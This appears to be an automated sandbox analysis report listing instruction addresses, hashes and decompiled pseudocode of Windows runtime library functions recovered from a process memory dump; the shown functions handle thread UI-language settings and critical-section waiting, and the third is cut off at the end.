0x03642677
0x0364267c
0x0364267f
0x03642681
0x03685b49
0x03685b4e
0x036427cd
0x036427d0
0x036427d1
0x036427d2
0x036427d4
0x036427dd
0x03642687
0x03642687
0x0364268a
0x0364268b
0x0364268e
0x0364268f
0x03642691
0x03642696
0x03642698
0x0364269d
0x0364269f
0x00000000
0x0364269f
0x03642681
0x00000000
0x00000000
0x03642846
0x00000000
0x00000000
0x03642605
0x0364260a
0x0364260c
0x03642611
0x03642616
0x03642619
0x03642619
0x0364261e
0x00000000
0x03642624
0x03642627
0x03642627
0x00000000
0x00000000
0x03685b1f
0x00000000
0x00000000
0x03642894
0x0364289b
0x0364289d
0x036428a1
0x03685b2b
0x03685b2e
0x03685b2e
0x036428a7
0x036428a9
0x03685b04
0x03685b09
0x03685b09
0x03685b09
0x00000000
0x00000000
0x03685b35
0x03685b3c
0x036428fb
0x036428fb
0x036426cc
0x036426cc
0x036426d0
0x00000000
0x036426d2
0x036426d2
0x00000000
0x036426d2
0x00000000
0x00000000
0x036425fe
0x0364292d
0x03642930
0x03642935
0x0364293b
0x0364293e
0x03642947
0x0364294e
0x0364295a
0x0364295e
0x03642962
0x03642963
0x03642966
0x0364296a
0x0364296e
0x03642972
0x03642973
0x03642978
0x0364297b
0x03642980
0x03642981
0x03642982
0x03642983
0x03642984
0x03642985
0x03642986
0x03642987
0x03642988
0x03642989
0x0364298a
0x0364298b
0x0364298c
0x0364298d
0x0364298e
0x0364298f
0x03642990
0x03642992
0x03642997
0x036429a3
0x036429a6
0x036429ab
0x036429ad
0x036429b0
0x036429b2
0x03685c80
0x036429b8
0x036429b8
0x036429bb
0x036429c0
0x036429c5
0x036429c6
0x036429c6
0x036429c9
0x036429cb
0x00000000
0x00000000
0x036429cd
0x036429d0
0x036429d9
0x036429db
0x036429dd
0x03642a7f
0x03642a84
0x03642a87
0x03642a89
0x03685ca1
0x03685ca3
0x00000000
0x03642a8f
0x03642a8f
0x00000000
0x03642a8f
0x00000000
0x036429e3
0x036429e3
0x036429e3
0x00000000
0x036429e3
0x036429dd
0x00000000
0x036429db
0x036429e6
0x036429e9
0x036429eb
0x036429ed
0x036429f3
0x036429f5
0x036429f8
0x036429fa
0x03642a97
0x03642a9a
0x03642a9d
0x03642add
0x00000000
0x03642a9f
0x03642aa2
0x03642aa5
0x03642aa8
0x03642aab
0x03685cab
0x03685caf
0x03685cc5
0x03685cda
0x03685cdc
0x03685cdf
0x03685ce5
0x00000000
0x03685ceb
0x03685ced
0x03685cee
0x00000000
0x03685cee
0x03685cb1
0x03685cb4
0x03685cb9
0x03685cbb
0x00000000
0x03685cbd
0x03685cbd
0x00000000
0x03685cbd
0x03685cbb
0x03642ab1
0x03642ab1
0x03642ac4
0x03642ac6
0x03642ac6
0x00000000
0x03642ac6
0x03642aab
0x00000000
0x03642a00
0x03642a09
0x03642a0e
0x03642a21
0x03642a24
0x03642a35
0x03642a3a
0x03642a3d
0x03642a42
0x03642a59
0x03642a59
0x03642a5c
0x03642a5f
0x03642a5f
0x036429fa
0x036429f3
0x03642a64
0x03642a64
0x03642a6b
0x03642a6b
0x03642a6d
0x03642a72
0x03642a72
0x00000000

Strings

PATH, xrefs: 03642642, 03642691

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 0a41996f15c8e79526c79bdee0784eebea7232d512fbd2f6ad661561b8b82280
Instruction ID: 12f2e167abe390396be84447186c27a0350b4f0d538f11f308ae6248de8b7535
Opcode Fuzzy Hash: 0a41996f15c8e79526c79bdee0784eebea7232d512fbd2f6ad661561b8b82280
Instruction Fuzzy Hash: 41C191B5D00219EFDB14DF99D9A0BADB7B5FF48700F284429F901AB350D734A952CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0364FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0364FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0362EEF0(0x3707b60);
					_t134 =  *0x3707b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3707b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3707b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03626D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E036276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E036B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0361B150();
													}
													_t116 = E036B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E036275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3708638; // 0x0
																	_t122 = L036238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E036276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E036276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0364FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L036270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0364FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0364FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0364FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0364FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0364FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3707b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3707b84 = _t75;
						_t73 = E0362EB70(_t134, 0x3707b60);
						if( *0x3707b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0362FF60( *0x3707b20);
							}
						}
						goto L5;
					}
				}
			}

0x0364fab0
0x0364fab2
0x0364fab3
0x0364fab4
0x0364fabc
0x0364fac0
0x0364fb14
0x0364fb17
0x0364fac2
0x0364fac8
0x0364facd
0x0364fad3
0x0364fad3
0x0364fadd
0x0364fb18
0x0364fb1b
0x0364fb1d
0x0364fb1e
0x0364fb1f
0x0364fb20
0x0364fb21
0x0364fb22
0x0364fb23
0x0364fb24
0x0364fb25
0x0364fb26
0x0364fb27
0x0364fb28
0x0364fb29
0x0364fb2a
0x0364fb2b
0x0364fb2c
0x0364fb2d
0x0364fb2e
0x0364fb2f
0x0364fb3a
0x0364fb3b
0x0364fb3e
0x0364fb41
0x0364fb44
0x0364fb47
0x0364fb4a
0x0364fb4d
0x0364fb53
0x0368bdcb
0x0368bdcb
0x0364fb59
0x0364fb5b
0x0364fb5b
0x0364fb5e
0x0368bdd5
0x0368bdd8
0x00000000
0x0368bdda
0x00000000
0x0368bdda
0x0364fb64
0x0364fb64
0x0364fb64
0x0364fb67
0x0364fb6e
0x0364fb70
0x0364fb72
0x00000000
0x0364fb78
0x0364fb7a
0x0364fb7a
0x0364fb7d
0x0364fb80
0x0368bddf
0x0368bde1
0x00000000
0x0368bde3
0x00000000
0x0368bde3
0x0364fb86
0x0364fb86
0x0364fb86
0x0364fb8b
0x0364fb90
0x0364fb92
0x0364fb94
0x0364fb9a
0x0364fb9b
0x0364fba1
0x0368bde8
0x0368bdeb
0x0368bded
0x0368beb5
0x0368beb5
0x0368bebb
0x0368bebd
0x0368bec3
0x0368bed2
0x0368bedd
0x0368bedd
0x0368beed
0x00000000
0x0368bdf3
0x0368bdfe
0x0368be06
0x0368be0b
0x0368be0d
0x0368be0f
0x0368be14
0x0368be19
0x0368be20
0x0368be25
0x0368be27
0x0368be35
0x0368be39
0x0368be46
0x0368be4f
0x0368be54
0x0368be56
0x0368bef8
0x0368bef8
0x00000000
0x0368be5c
0x0368be5c
0x0368be60
0x00000000
0x0368be66
0x0368be66
0x0368be7f
0x0368be84
0x0368be87
0x0368be89
0x0368be8b
0x0368be99
0x0368be9d
0x0368bea0
0x0368beac
0x0368beaf
0x0368beb1
0x0368beb3
0x0368beb3
0x00000000
0x0368bea2
0x0368bea2
0x00000000
0x0368bea2
0x0368be8d
0x0368be8d
0x0368be92
0x00000000
0x0368be92
0x0368be8b
0x0368be60
0x0368be3b
0x0368be3b
0x0368be3e
0x00000000
0x0368be40
0x0368be40
0x0368be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0368be44
0x0368be3e
0x0368be29
0x0368be29
0x00000000
0x0368be29
0x0368be27
0x00000000
0x0364fba7
0x0364fba7
0x0364fbab
0x0368bf02
0x0364fbb1
0x0364fbb1
0x0364fbb8
0x0364fbbd
0x0364fbbd
0x0364fbbf
0x0364fbbf
0x0364fbc5
0x0364fbcb
0x0364fbf8
0x0364fbf8
0x0364fbfa
0x00000000
0x0364fc00
0x0364fc00
0x0364fc03
0x00000000
0x0364fc09
0x0364fc09
0x0364fc0f
0x0364fc15
0x0364fc23
0x0364fc23
0x0364fc25
0x0364fc27
0x0364fc75
0x0364fc7c
0x0364fc84
0x00000000
0x0364fc29
0x0364fc29
0x0364fc2d
0x0364fc30
0x0368bf0f
0x00000000
0x0364fc36
0x0364fc38
0x0364fc3b
0x0364fc41
0x0368bf17
0x0368bf19
0x0368bf48
0x0368bf4b
0x00000000
0x0368bf1b
0x0368bf22
0x0368bf24
0x0368bf26
0x00000000
0x0368bf2c
0x0368bf37
0x0368bf39
0x0368bf3b
0x00000000
0x0368bf41
0x0368bf41
0x0368bf41
0x0368bf41
0x0368bf45
0x00000000
0x0368bf45
0x0368bf3b
0x0368bf26
0x00000000
0x0364fc47
0x0364fc47
0x0364fc49
0x0364fcb2
0x0364fcb4
0x0364fcb6
0x0364fcdc
0x0364fcdc
0x00000000
0x0364fcb8
0x0364fcc3
0x0364fcc5
0x0364fcc7
0x00000000
0x0364fcc9
0x0364fcc9
0x0364fccd
0x00000000
0x0364fccd
0x0364fcc7
0x00000000
0x0364fc4b
0x0364fc4b
0x0364fc4e
0x0364fc4e
0x0364fc51
0x0364fc51
0x0364fc54
0x0364fc5a
0x0364fc5c
0x0364fc5f
0x0364fc61
0x0364fc63
0x0364fc65
0x0364fc67
0x0364fc6e
0x0364fc72
0x0364fc72
0x0364fc72
0x0364fc72
0x0364fc67
0x0364fc61
0x00000000
0x0364fc5a
0x0364fc49
0x0364fc41
0x0364fc30
0x0364fc27
0x0364fc03
0x0364fbcd
0x0364fbd3
0x0364fbd9
0x0364fbdc
0x0364fbde
0x0364fc99
0x0364fc9b
0x0364fc9d
0x0364fcd5
0x0364fcd5
0x0364fc89
0x0364fc89
0x00000000
0x0364fc9f
0x0364fc9f
0x0364fca3
0x00000000
0x0364fca3
0x00000000
0x0364fbe4
0x0364fbe4
0x0364fbe4
0x0364fbe4
0x0364fbe9
0x0364fbf2
0x00000000
0x0364fbf2
0x0364fbde
0x0364fbcb
0x0364fbab
0x0364fc8b
0x0364fc8b
0x0364fc8c
0x0364fb80
0x0364fb72
0x0364fb5e
0x0364fc8d
0x0364fc91
0x0364fadf
0x0364fadf
0x0364fae1
0x0364fae4
0x0364fae7
0x0364faec
0x0364faf8
0x0364fb00
0x0364fb07
0x0364fb0f
0x0364fb0f
0x0364fb07
0x00000000
0x0364faf8
0x0364fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0368BE0F

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4c97ada43ab59e7a1290d0ad11174eed690e0953d468a4d2565f23b447dcd9a2
Instruction ID: 083d177ec91ac2275899471968b4c660796c953a3224f6c31b71f00eced9dad8
Opcode Fuzzy Hash: 4c97ada43ab59e7a1290d0ad11174eed690e0953d468a4d2565f23b447dcd9a2
Instruction Fuzzy Hash: 19A1F175F00B069FDB25EF68C554B6AB7B5AF49714F08866DE806DF780DB34D8028B80

Uniqueness

Uniqueness Score: -1.00%

Function 03612D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E03612D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3705350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3707bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E036597C0();
				}
				if( *0x37079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x37079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03641624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03637D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E036AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03659520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0364E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0366DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3706901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3706901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03659980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E036595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03637D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03637D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03697016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E036AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3705350;
							if(_t109 != 0x3705350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E036AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E036A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x03612d8a
0x03612d8a
0x03612d92
0x03612d96
0x03612d9e
0x03612da0
0x03612da3
0x03612da5
0x03612da8
0x03612dab
0x03612db2
0x0366f9aa
0x0366f9ab
0x0366f9ae
0x0366f9ae
0x03612db8
0x03612dc2
0x0366f9b9
0x0366f9be
0x0366f9bf
0x0366f9bf
0x03612dcf
0x0366f9c9
0x03612dd5
0x03612dd5
0x03612dd5
0x03612dde
0x03612de1
0x03612e70
0x03612e72
0x03612e72
0x03612de7
0x03612deb
0x03612e7c
0x03612e83
0x03612e85
0x03612e8b
0x03612e8d
0x03612e92
0x03612e92
0x03612e85
0x03612df1
0x03612df7
0x03612df9
0x03612df9
0x03612dfc
0x03612dff
0x03612e02
0x00000000
0x03612e05
0x03612e0c
0x0366f9d9
0x03612e12
0x03612e12
0x03612e12
0x03612e1a
0x0366f9e3
0x0366f9e9
0x0366f9f0
0x0366f9f6
0x0366f9f8
0x0366f9f8
0x0366f9f0
0x03612e23
0x0366fa02
0x0366fa03
0x0366fa05
0x0366fa06
0x00000000
0x03612e29
0x03612e29
0x03612e2e
0x03612e34
0x03612e3e
0x00000000
0x00000000
0x03612e44
0x03612e47
0x03612e4d
0x00000000
0x00000000
0x03612e4f
0x03612e54
0x00000000
0x00000000
0x03612e5a
0x03612e5f
0x03612e9a
0x03612ea4
0x03612ea5
0x03612ea8
0x03612eaf
0x03612eb2
0x03612eb5
0x0366fae9
0x0366faeb
0x0366faed
0x0366faef
0x0366faf7
0x0366faf8
0x0366fafd
0x0366faff
0x0366fb04
0x0366fb04
0x0366faff
0x03612ec0
0x03612ec4
0x03612ec6
0x03612ec8
0x0366fb14
0x0366fb18
0x0366fb1e
0x0366fb21
0x0366fb21
0x03612ece
0x03612ece
0x03612ece
0x03612ed7
0x03612e61
0x03612e63
0x0366fa6b
0x0366fa71
0x0366fa76
0x0366fa78
0x0366fa8a
0x0366fa7a
0x0366fa83
0x0366fa83
0x0366fa8f
0x0366fa91
0x0366fa97
0x0366fa9d
0x0366faa4
0x0366faaa
0x0366faaf
0x0366fab1
0x0366fac3
0x0366fab3
0x0366fabc
0x0366fabc
0x0366fac8
0x0366facb
0x0366fadf
0x0366fadf
0x0366facb
0x0366faa4
0x0366fa91
0x03612e6f
0x03612e6f
0x03612e5f
0x0366fa13
0x0366fa15
0x0366fa17
0x0366fa1f
0x0366fa21
0x0366fa22
0x0366fa25
0x0366fa28
0x0366fa2f
0x0366fa2f
0x0366fa2a
0x0366fa2a
0x0366fa2a
0x0366fa31
0x0366fa34
0x0366fa36
0x0366fa3c
0x0366fa3e
0x0366fa41
0x0366fa43
0x0366fa45
0x0366fa45
0x0366fa41
0x0366fa3c
0x0366fa4a
0x0366fa4f
0x0366fa51
0x0366fa53
0x0366fa56
0x0366fa5b
0x0366fa5e
0x00000000
0x0366fa5e
0x03612e23

Strings

RTL: Re-Waiting, xrefs: 0366FA4A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 55214c77ad821ffc874f086f020f3942589424494644b0ab8e602c533f56e0a0
Instruction ID: f959ee0a5036daf2db737d203fe35bf61380a07a9acd2f9c3acef8b038fbe83b
Opcode Fuzzy Hash: 55214c77ad821ffc874f086f020f3942589424494644b0ab8e602c533f56e0a0
Instruction Fuzzy Hash: 83613470A00644EFDB31DF68D990B7EB7E5EB49764F1C0AA9E8519F3C0CB7499118B81

Uniqueness

Uniqueness Score: -1.00%

Function 036E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E036E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E036DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E036E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
